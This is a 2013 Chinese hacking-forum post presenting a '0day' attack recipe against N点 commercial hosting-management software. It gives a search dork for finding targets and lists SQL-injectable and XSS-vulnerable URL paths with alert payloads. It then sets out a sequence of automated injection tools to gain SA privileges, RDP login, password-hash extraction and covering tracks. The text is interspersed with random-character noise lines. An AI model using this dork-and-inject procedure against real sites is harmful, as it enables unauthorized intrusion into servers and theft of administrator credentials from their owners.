中国网络渗透测试联盟
标题:
N点商业版漏洞通杀0day以及利用方法
[打印本页]
作者:
admin
时间:
2013-3-3 08:06
标题:
N点商业版漏洞通杀0day以及利用方法
不得不说N点实在是一个破东西
% }& |9 x1 m8 c* |3 [; Z) k: U! R
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
' ?& _6 M0 K# O* p9 P0 C9 \6 q. u
好吧 抱怨一下就行了 接下来关键的时候到了
# H1 k; [" \( Z% ^5 E, s
首先百度搜索关键字:inurl: (mmdatabase.asp)
8 I, ?$ P, T+ p/ I/ a; M
我随便列举一个:
www.xxxx.com
9 J% W: ^6 Y$ H# R T
修改链接:
http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
4 z4 k1 X0 @5 o% I
扔入NBSI 或者啊D等各种傻逼工具后
) I! \1 `, e6 e9 V
你们会看到是SA权限
3 }0 ]( V; }2 v; L# ]9 r
果断3389 上去 hash得到administrator密码
0 K3 t$ x3 p' d9 i# D. B
擦屁股走人~
2 t% w/ f u* ]2 [9 T0 ?
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
/ e7 F# n1 c, X: J& ^& a
9 D6 g3 z" T: ?
再附上其他几个漏洞页面
, g ]' O6 f( m8 ^, V
SQL:
7 y1 `. W3 o: I
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
8 y, H+ \2 K \( z( O f- p
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
: p( M: s* _! A+ p7 g
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
" p5 q& s7 Q/ G ~9 F$ X L
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
* i K# M6 f8 Z4 w4 _9 e
XSS证明:
% C! F3 {/ M9 F
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
! A1 ?1 u0 t) |: E- a# @1 q
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
2 p! D+ A5 O/ s* Z5 \
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn
<script>alert(42873)</script>
% ~" C8 I' T/ B, [$ n4 G; J
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
4 s0 `" W6 S! I, ^, ` s* d x
还是星外吧 你们懂的
8 w2 T8 t. i/ m' l4 F2 [
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
2 ?6 T# C- }8 l; t" w, [% I0 s" F! Z: O
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
9 b* t5 @8 }9 o
——-
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2